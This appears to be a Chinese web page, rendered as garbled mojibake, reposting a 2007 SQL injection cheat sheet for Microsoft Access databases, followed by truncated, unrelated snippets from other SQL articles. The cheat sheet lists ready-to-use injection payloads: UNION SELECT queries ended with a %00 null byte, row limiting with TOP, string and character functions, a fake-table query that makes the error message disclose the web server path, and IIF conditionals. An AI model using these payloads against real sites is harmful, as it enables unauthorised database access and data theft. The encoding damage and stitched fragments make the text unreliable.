ÕûÀí±È½ÏÈ«µÄAccess SQL×¢Èë²Î¿¼
Access SQL×¢Èë²Î¿¼
°æ±¾ 0.2.1
(×î½ü¸üР10/10/2007)
Ô×÷Õß²»Ïê
ÃèÊö SQL²éѯ¼°×¢ÊÍ
×¢ÊÍ·û AccessÖÐûÓÐרÃŵÄ×¢ÊÍ·ûºÅ.Òò´Ë"/*", "--"ºÍ"#"¶¼Ã»·¨Ê¹ÓÃ.µ«ÊÇ¿ÉÒÔʹÓÿÕ×Ö·û"NULL"(%00)´úÌæ:
' UNION SELECT 1,1,1 from validTableName%00
Óï·¨´íÎóÐÅÏ¢ "[Microsoft][Driver ODBC Microsoft Access]"
¶à¾äÖ´ÐÐ ²»Ö§³Ö.
ÁªºÏ²éѯ AccessÖ§³ÖÁªºÏ²éѯ,UNIONºóµÄfrom¹Ø¼ü×Ö±ØÐëʹÓÃÒ»¸öÒѾ´æÔڵıíÃû.
¸½Êô²éѯ AccessÖ§³Ö¸½Êô²éѯ(ÀýÈç:"TOP 1"ÓÃÀ´·µ»ØµÚÒ»ÐеÄÄÚÈÝ) :
' AND (SELECT TOP 1 'someData' from validTableName)%00
LIMITÖ§³Ö LIMIT²»±»Ö§³Ö,µ«ÊÇÔÚ²éѯÖпÉÒÔÉùÃ÷"TOP N"À´ÏÞÖÆ·µ»ØÄÚÈݵÄÐÐÊý:
' UNION SELECT TOP 3 AttrName from validTableName%00 : ÕâÌõÓï¾ä·µ»Ø(Ç°)3 ÐÐ.
Èòéѯ·µ»Ø0ÐÐ Ôڽű¾ÔÚ·µ»ØµÄHTML½á¹ûÖÐÖ»ÏÔʾµÚÒ»¸ö²éѯµÄ½á¹ûµÄʱºò·Ç³£ÓÐÓÃ:
' AND 1=0 UNION SELECT AttrName1,AttrName2 from validTableName%00
×Ö·û´®Á¬½Ó ²»Ö§³ÖCONCAT()º¯Êý. ¿ÉÒÔʹÓÃ"&"»ò"+"²Ù×÷À´Á©½ÓÁ½¸ö×Ö·û´®.ÔÚʹÓõÄʱºî±ØÐë¶ÔÕâÁ½¸ö²Ù×÷·û½øÐÐURLencode±àÂë:
' UNION SELECT 'web' %2b 'app' from validTableName%00 : ·µ»Ø"webapp"
' UNION SELECT 'web' %26 'app' from validTableName%00 : ·µ»Ø"webapp"
×Ó×Ö·û´® MID()º¯Êý:
' UNION SELECT MID('abcd',1,1) from validTableName%00 : ·µ»Ø "a"
' UNION SELECT MID('abcd',2,1) from validTableName%00 : ·µ»Ø "b"
×Ö·û´®³¤¶È LEN()º¯Êý:
' UNION SELECT LEN('1234') from validTableName%00 : ·µ»Ø 4
±©WEB·¾¶ ¿ÉÒÔͨ¹ý¶ÔÒ»¸ö²»´æÔڵĿâ½øÐÐSELECT²Ù×÷.Access½«»á»ØÓ¦Ò»Ìõ°üº¬ÓÐÍêÕû·¾¶µÄ´íÎóÐÅÏ¢.:
' UNION SELECT 1 from ThisIsAFakeName.FakeTable%00
È¡×Ö·ûµÄASCIIÖµ ASC()º¯Êý:
' UNION SELECT ASC('A') from ValidTable%00 :·µ»Ø65 ('A'µÄASCIIÖµ)
ASCIIֵת»»Îª×Ö·û CHR()º¯Êý:
' UNION SELECT CHR(65) from validTableName%00 : ·µ»Ø 'A'
IFÓï¾ä ¿ÉÒÔʹÓÃIIF()º¯Êý. Óï·¨ : IIF(condition, true, false) :
' UNION SELECT IIF(1=1, 'a', 'b') from validTableName%00 : ·µ»Ø 'a'
ʱ¼ä½Ó¿Ú ²»´æÔÚÀàËÆBENCHMARK()»òSLEEP()µÄº¯Êý,µ«ÊÇ¿ÉÒÔʹÓôóÁ¿(¸ß¸ºÔØ)µÄ²éѯÀ´´ïµ½Õâ¸öЧ¹û.µã»÷ÕâÀï²é¿´²Î¿¼.
Ïà¹ØÎĵµ£º
£¨1£© Ñ¡Ôñ×îÓÐЧÂʵıíÃû˳Ðò(Ö»ÔÚ»ùÓÚ¹æÔòµÄÓÅ»¯Æ÷ÖÐÓÐЧ)£º
ORACLE µÄ½âÎöÆ÷°´ÕÕ´ÓÓÒµ½×óµÄ˳Ðò´¦Àífrom×Ó¾äÖеıíÃû£¬from×Ó¾äÖÐдÔÚ×îºóµÄ±í(»ù´¡±í driving table)½«±»×îÏÈ´¦Àí£¬ÔÚfrom×Ó¾äÖаüº¬¶à¸ö±íµÄÇé¿öÏÂ,Äã±ØÐëÑ¡Ôñ¼Ç¼ÌõÊý×îÉٵıí×÷Ϊ»ù´¡±í¡£Èç¹ûÓÐ3¸öÒÔÉϵıíÁ¬½Ó²éѯ, ÄǾÍÐèҪѡÔñ½»²æ±í(intersectio ......
Êý¾Ý²ã´ÎµÄ¸ÅÄî:
Êý¾Ý²ã´ÎÊDZí´ïÊý¾ÝµÄÒ»ÖÖÖØÒª¹Øϵ£¬ÔÚÊý¾Ý¿âµÄÉè¼ÆÖУ¬È磺×éÖ¯½á¹¹·Ö½â¡¢¹¤×÷ÈÎÎñ·Ö½â¡¢ÐÐÕþÇø»®µÄ·Ö½âµÈ¶¼ÊDzã´Î¹ØϵÊý¾ÝµÄµäÐÍʵÀý¡£
±í´ï²ã´Î¹ØϵµÄÊý¾ÝÒ»°ãÐèҪʵÏÖÈçÏÂÊôÐÔ£º
1.²ã´ÎµÄ×î´ó¼¶Áª²ã´ÎÊý¡£È磺Öйú£>ºþÄÏÊ¡->³¤É³ÊÐ->Ó껨Çø£¬¾ÍÊÇ4²ã¡£
2.ÄÜ·´Ó³Í¬Ò»² ......
SELECT * from user WHERE name LIKE '%Èý%';
½«»á°ÑnameΪ“ÕÅÈý”£¬“Èý½Å蔣¬“ÌÆÈý²Ø”µÈµÈÓГÈý”µÄÈ«ÕÒ³öÀ´£»
ÔÚ½øÐÐÊý¾Ý¿â²éѯʱ£¬ÓÐÍêÕû²éѯºÍÄ£ºý²éѯ֮·Ö¡£
Ò»°ãÄ£ºýÓï¾äÈçÏ£º
SELECT ×ֶΠfrom ±í WHERE ij×ֶΠLike Ìõ¼þ
ÆäÖйØÓÚÌõ¼þ£¬SQLÌṩÁËËÄÖÖÆ¥ÅäÄ£Ê ......
Óë³Ö¾Ã±íÒ»Ñù£¬ÓÅ»¯Æ÷´´½¨²¢Î¬»¤ÁÙʱ±íµÄ·Ö²¼Í³¼ÆÐÅÏ¢£¬²¢¸ú×ÙËüµÄ»ùÊý¡£µ±Ë÷ÒýÁÙʱ±íʱ£¬ÕâÖÖÄÜÁ¦ÓÈÆäÖØÒª¡£µ±ÓÅ»¯Æ÷ÐèÒªÆÀ¹ÀÑ¡ÔñÐÔʱ£¬Ëü¾Í¿ÉÒÔ¸ù¾ÝÕâЩ·Ö²¼Í³¼ÆÐÅÏ¢Éú³É¾¹ýÓÅ»¯µÄ¼Æ»®¡£ÕâÊÇÁÙʱ±íÔÚÐÔÄÜ·½Ã治ͬÓÚ±í±äÁ¿µÄÖ÷ÒªÌØÐÔÖ®Ò»¡£
´ËÍ⣬ÒòΪÁÙʱ±í»áά»¤Í³¼ÆÐÅÏ¢£¬Èç¹ûÉϴαàÒëºó±»ÒýÓñíÓÐ×ã¹»¶àµÄÐз¢ ......
·¢²¼Ò»¸öʵÓÃС¹¤¾ß£¬¿ÉÒԺܷ½±ãµÄÔÚÊý¾Ý¿âÖÐÕÒµ½°üº¬Ö¸¶¨×Ö·û´®µÄÊý¾Ý±íÃû¼°ÏàÓ¦¼Ç¼£º
/*
¹¦ÄÜ£º²éѯÊý¾Ý¿âÖаüº¬Ö¸¶¨×Ö·û´®µÄÊý¾Ý±íÃû¼°ÏàÓ¦¼Ç¼
×÷Õߣº³Â¼ÓÅô chjpeng#163.com
ÈÕÆÚ£º2009-08-17
*/
declare @key varchar(30)
set @key = 'test' --Ì滻ΪҪ²éÕÒµÄ×Ö·û´®
DECLARE @ ......